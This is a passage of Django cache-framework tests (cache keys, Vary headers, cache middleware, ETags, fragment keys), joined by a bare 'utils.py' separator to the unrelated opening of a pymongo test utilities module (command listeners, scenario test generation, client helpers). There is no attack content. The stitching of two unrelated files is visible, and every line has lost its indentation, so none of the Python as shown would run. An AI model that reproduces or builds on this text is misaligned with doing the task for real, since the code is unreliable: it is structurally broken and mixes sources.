# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
@override_settings(ROOT_URLCONF="admin_views.urls")
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
utils.py
|
# Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import collections
import contextlib
import functools
import os
import re
import sys
import threading
import time
import warnings
from collections import defaultdict
from functools import partial
from bson import json_util, py3compat
from bson.objectid import ObjectId
from pymongo import (MongoClient,
monitoring)
from pymongo.errors import OperationFailure
from pymongo.monitoring import _SENSITIVE_COMMANDS
from pymongo.read_concern import ReadConcern
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd)
from test.utils_selection_tests import parse_read_preference
IMPOSSIBLE_WRITE_CONCERN = WriteConcern(w=1000)
class WhiteListEventListener(monitoring.CommandListener):
def __init__(self, *commands):
self.commands = set(commands)
self.results = defaultdict(list)
def started(self, event):
if event.command_name in self.commands:
self.results['started'].append(event)
def succeeded(self, event):
if event.command_name in self.commands:
self.results['succeeded'].append(event)
def failed(self, event):
if event.command_name in self.commands:
self.results['failed'].append(event)
class EventListener(monitoring.CommandListener):
def __init__(self):
self.results = defaultdict(list)
def started(self, event):
self.results['started'].append(event)
def succeeded(self, event):
self.results['succeeded'].append(event)
def failed(self, event):
self.results['failed'].append(event)
def started_command_names(self):
"""Return list of command names started."""
return [event.command_name for event in self.results['started']]
class OvertCommandListener(EventListener):
"""A CommandListener that ignores sensitive commands."""
def started(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).started(event)
def succeeded(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).succeeded(event)
def failed(self, event):
if event.command_name.lower() not in _SENSITIVE_COMMANDS:
super(OvertCommandListener, self).failed(event)
class ServerAndTopologyEventListener(monitoring.ServerListener,
monitoring.TopologyListener):
"""Listens to all events."""
def __init__(self):
self.results = []
def opened(self, event):
self.results.append(event)
def description_changed(self, event):
self.results.append(event)
def closed(self, event):
self.results.append(event)
class HeartbeatEventListener(monitoring.ServerHeartbeatListener):
"""Listens to only server heartbeat events."""
def __init__(self):
self.results = []
def started(self, event):
self.results.append(event)
def succeeded(self, event):
self.results.append(event)
def failed(self, event):
self.results.append(event)
class ScenarioDict(dict):
"""Dict that returns {} for any unknown key, recursively."""
def __init__(self, data):
def convert(v):
if isinstance(v, collections.Mapping):
return ScenarioDict(v)
if isinstance(v, (py3compat.string_type, bytes)):
return v
if isinstance(v, collections.Sequence):
return [convert(item) for item in v]
return v
dict.__init__(self, [(k, convert(v)) for k, v in data.items()])
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
# Unlike a defaultdict, don't set the key, just return a dict.
return ScenarioDict({})
class CompareType(object):
"""Class that compares equal to any object of the given type."""
def __init__(self, type):
self.type = type
def __eq__(self, other):
return isinstance(other, self.type)
def __ne__(self, other):
"""Needed for Python 2."""
return not self.__eq__(other)
class TestCreator(object):
"""Class to create test cases from specifications."""
def __init__(self, create_test, test_class, test_path):
"""Create a TestCreator object.
:Parameters:
- `create_test`: callback that returns a test case. The callback
must accept the following arguments - a dictionary containing the
entire test specification (the `scenario_def`), a dictionary
containing the specification for which the test case will be
generated (the `test_def`).
- `test_class`: the unittest.TestCase class in which to create the
test case.
- `test_path`: path to the directory containing the JSON files with
the test specifications.
"""
self._create_test = create_test
self._test_class = test_class
self.test_path = test_path
def _ensure_min_max_server_version(self, scenario_def, method):
"""Test modifier that enforces a version range for the server on a
test case."""
if 'minServerVersion' in scenario_def:
min_ver = tuple(
int(elt) for
elt in scenario_def['minServerVersion'].split('.'))
if min_ver is not None:
method = client_context.require_version_min(*min_ver)(method)
if 'maxServerVersion' in scenario_def:
max_ver = tuple(
int(elt) for
elt in scenario_def['maxServerVersion'].split('.'))
if max_ver is not None:
method = client_context.require_version_max(*max_ver)(method)
return method
@staticmethod
def valid_topology(run_on_req):
return client_context.is_topology_type(
run_on_req.get('topology', ['single', 'replicaset', 'sharded']))
@staticmethod
def min_server_version(run_on_req):
version = run_on_req.get('minServerVersion')
if version:
min_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version >= min_ver
return True
@staticmethod
def max_server_version(run_on_req):
version = run_on_req.get('maxServerVersion')
if version:
max_ver = tuple(int(elt) for elt in version.split('.'))
return client_context.version <= max_ver
return True
def should_run_on(self, scenario_def):
run_on = scenario_def.get('runOn', [])
if not run_on:
# Always run these tests.
return True
for req in run_on:
if (self.valid_topology(req) and
self.min_server_version(req) and
self.max_server_version(req)):
return True
return False
def ensure_run_on(self, scenario_def, method):
"""Test modifier that enforces a 'runOn' on a test case."""
return client_context._require(
lambda: self.should_run_on(scenario_def),
"runOn not satisfied",
method)
def create_tests(self):
for dirpath, _, filenames in os.walk(self.test_path):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = ScenarioDict(
json_util.loads(scenario_stream.read()))
test_type = os.path.splitext(filename)[0]
# Construct test from scenario.
for test_def in scenario_def['tests']:
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_").replace('.', '_'),
str(test_def['description'].replace(" ", "_").replace(
'.', '_')))
new_test = self._create_test(
scenario_def, test_def, test_name)
new_test = self._ensure_min_max_server_version(
scenario_def, new_test)
new_test = self.ensure_run_on(
scenario_def, new_test)
new_test.__name__ = test_name
setattr(self._test_class, new_test.__name__, new_test)
def _connection_string(h, authenticate):
if h.startswith("mongodb://"):
return h
elif client_context.auth_enabled and authenticate:
return "mongodb://%s:%s@%s" % (db_user, db_pwd, str(h))
else:
return "mongodb://%s" % (str(h),)
def _mongo_client(host, port, authenticate=True, direct=False, **kwargs):
"""Create a new client over SSL/TLS if necessary."""
host = host or client_context.host
port = port or client_context.port
client_options = client_context.default_client_options.copy()
if client_context.replica_set_name and not direct:
client_options['replicaSet'] = client_context.replica_set_name
client_options.update(kwargs)
client = MongoClient(_connection_string(host, authenticate), port,
**client_options)
return client
def single_client_noauth(h=None, p=None, **kwargs):
"""Make a direct connection. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, direct=True, **kwargs)
def single_client(h=None, p=None, **kwargs):
"""Make a direct connection, and authenticate if necessary."""
return _mongo_client(h, p, direct=True, **kwargs)
def rs_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set. Don't authenticate."""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_client(h=None, p=None, **kwargs):
"""Connect to the replica set and authenticate if necessary."""
return _mongo_client(h, p, **kwargs)
def rs_or_single_client_noauth(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Like rs_or_single_client, but does not authenticate.
"""
return _mongo_client(h, p, authenticate=False, **kwargs)
def rs_or_single_client(h=None, p=None, **kwargs):
"""Connect to the replica set if there is one, otherwise the standalone.
Authenticates if necessary.
"""
return _mongo_client(h, p, **kwargs)
def one(s):
"""Get one element of a set"""
return next(iter(s))
def oid_generated_on_process(oid):
"""Makes a determination as to whether the given ObjectId was generated
by the current process, based on the 5-byte random number in the ObjectId.
"""
return ObjectId._random() == oid.binary[4:9]
def delay(sec):
return '''function() { sleep(%f * 1000); return true; }''' % sec
def get_command_line(client):
command_line = client.admin.command('getCmdLineOpts')
assert command_line['ok'] == 1, "getCmdLineOpts() failed"
return command_line
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def camel_to_upper_camel(camel):
return camel[0].upper() + camel[1:]
def camel_to_snake_args(arguments):
for arg_name in list(arguments):
c2s = camel_to_snake(arg_name)
arguments[c2s] = arguments.pop(arg_name)
return arguments
def parse_collection_options(opts):
if 'readPreference' in opts:
opts['read_preference'] = parse_read_preference(
opts.pop('readPreference'))
if 'writeConcern' in opts:
opts['write_concern'] = WriteConcern(
**dict(opts.pop('writeConcern')))
if 'readConcern' in opts:
opts['read_concern'] = ReadConcern(
**dict(opts.pop('readConcern')))
return opts
def server_started_with_option(client, cmdline_opt, config_opt):
"""Check if the server was started with a particular option.
:Parameters:
- `cmdline_opt`: The command line option (i.e. --nojournal)
- `config_opt`: The config file option (i.e. nojournal)
"""
command_line = get_command_line(client)
if 'parsed' in command_line:
parsed = command_line['parsed']
if config_opt in parsed:
return parsed[config_opt]
argv = command_line['argv']
return cmdline_opt in argv
def server_started_with_auth(client):
try:
command_line = get_command_line(client)
except OperationFailure as e:
msg = e.details.get('errmsg', '')
if e.code == 13 or 'unauthorized' in msg or 'login' in msg:
# Unauthorized.
return True
raise
